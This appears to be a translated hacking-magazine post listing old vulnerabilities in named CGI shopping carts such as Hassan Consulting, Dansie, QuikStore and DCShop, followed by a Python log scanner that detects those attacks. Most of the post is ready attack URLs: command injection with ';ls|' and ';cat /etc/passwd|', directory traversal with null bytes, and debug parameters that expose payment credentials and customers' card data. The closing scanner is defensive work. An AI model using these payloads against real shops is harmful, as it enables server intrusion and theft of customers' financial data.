We continue our look at bugs in popular shopping carts from the recent past.
This time we first examine the carts that allowed arbitrary commands to be executed, and afterwards some other goodies.
№ 1 First up is the (e)shop Online-Shop System from Webdiscount.net
The script does not filter the semicolon (;) and pipe (|) characters:
www.xxx.com/cgi-bin/eshop.pl?Seite=;ls|
№ 2 Hassan Consulting's Shopping Cart [shop.cgi] from Hassan Consulting.
The same:
www.xxx.com/cgi-local/shop.pl/page=|ls|
www.xxx.com/cgi-local/shop.pl/page=;ls|
Unfortunately, in versions 4 and above of Hassan Consulting's Shopping Cart this bug has already been fixed, but there is another problem: requesting www.xxx.com/cgi-local/shop.pl reveals the version of the shopping cart and the path to the script.
№ 3 ShopPlus Cart
The same again, input characters are not checked:
www.xxx.com/scripts/shopplus.cgi?Dn=domainname.com&cartid=%CARTID%&file=;uid|
www.xxx.com/scripts/shopplus.cgi?Dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
№ 4 multi-shop 1.06
Instead of a template file, you can specify any command.
www.xxx.com/cgi-bin/mshop2?product_template=;ls|&show_items=1&config_file=picodirect.co.uk_mshop2.conf&user_notebooks=note_envoy
№ 5 WebCart by Mountain Network Systems
We execute remote commands:
www.xxx.com/cgi-bin/webcart.cgi?CONFIG=moutain&CHANGE=YESNEXTPAGE=;ls|&CODE=PHOLD
Next, we look at other vulnerabilities.
№ 6 Dansie Shopping Cart 3.04 Multiple Vulnerabilities
Appending specific variables and values to the end of http://target/cgi-bin/cart.pl? allows remote users to perform some actions.
"vars" displays the application's configuration settings, which include the user name and password used for credit card transactions.
Environment settings can be obtained using "env".
The string "db" lists the complete database file containing all the items in the shopping cart.
www.xxx.com/cgi-bin/cart.pl?vars
www.xxx.com/cgi-bin/cart.pl?env
www.xxx.com/cgi-bin/cart.pl?db
№ 7 ShopCartCGI v 2.3
A flaw allows a remote user to view files on the server:
www.xxx.com/directory/gotopage.cgi?13686+/../../../../../../../../../../../../../../../../etc/passwd
www.xxx.com/directory/genindexpage.cgi?13687+Home+/../../../../../../../../../../../../../../../../etc/passwd
№ 8 QuikStore Shopping Cart
A remote user can view files on the system:
www.xxx.com/quikstore.cgi?blah&template=../../../../../../../../../../etc/passwd%00.html
www.xxx.com/quikstore.cgi?blah&template=../../../../../../../../../../../../etc/hosts
www.xxx.com/quikstore.cgi?blah&template=../../../../../../../../../../../../usr/bin/id|
№ 9 DCShop Electronic Shopping Cart
A whole bunch of bugs:
www.xxx.com/cgi-bin/DCShop/Orders/orders.txt - in old versions of the cart, credit card information could be viewed like this.
www.xxx.com/cgi-bin/DCShop/dcshop_admin.cgi?action=view_orders - returns credit card information in some newer versions.
Your bug Durito.
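For anyone still running CGI carts like these, the request shapes listed above are easy to spot in web server access logs. The following is an added example, not part of the original post: the function names, the log format (Common Log Format) and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

SHELL_META = re.compile(r"[;|`]")                    # command separators and pipes
TRAVERSAL = re.compile(r"(^|[/\\+=])\.\.([/\\]|$)")  # ".." right after a delimiter
DEBUG_KEYWORDS = {"vars", "env", "db"}               # bare cart.pl query strings
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode(value, rounds=3):
    """Percent-decode repeatedly so double encoding (%252e) is also caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(target):
    """Return the set of findings for one request target (path plus query)."""
    parts = urlsplit(target)
    path, query = decode(parts.path), decode(parts.query)
    findings = set()
    if SHELL_META.search(path) or SHELL_META.search(query):
        findings.add("shell-metacharacter")  # ';' may be legitimate on some sites
    if TRAVERSAL.search(path) or TRAVERSAL.search(query):
        findings.add("path-traversal")
    if "\x00" in path or "\x00" in query:
        findings.add("null-byte")
    if path.endswith("/cart.pl") and query in DEBUG_KEYWORDS:
        findings.add("debug-keyword")
    return findings

def scan(log_lines):
    """Return (line_number, sorted findings) for every suspicious log line."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        findings = classify(match.group(1)) if match else set()
        if findings:
            hits.append((number, sorted(findings)))
    return hits

# Constructed sample lines (documentation address), not real log data.
PREFIX = '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] '
SAMPLE_LOG = [
    PREFIX + '"GET /cgi-bin/eshop.pl?Seite=index.html HTTP/1.0" 200 512',
    PREFIX + '"GET /cgi-bin/eshop.pl?Seite=%3Bls%7C HTTP/1.0" 200 901',
    PREFIX + '"GET /quikstore.cgi?blah&template=../../etc/passwd%00.html HTTP/1.0" 200 1200',
    PREFIX + '"GET /cgi-bin/cart.pl?env HTTP/1.0" 200 2048',
    PREFIX + '"GET /cgi-bin/cart.pl?item=12&qty=1 HTTP/1.0" 200 700',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, ", ".join(findings))
```

A hit with a 200 status on one of these scripts is a reason to check what the response contained and to remove or replace the script, not just to block the source address.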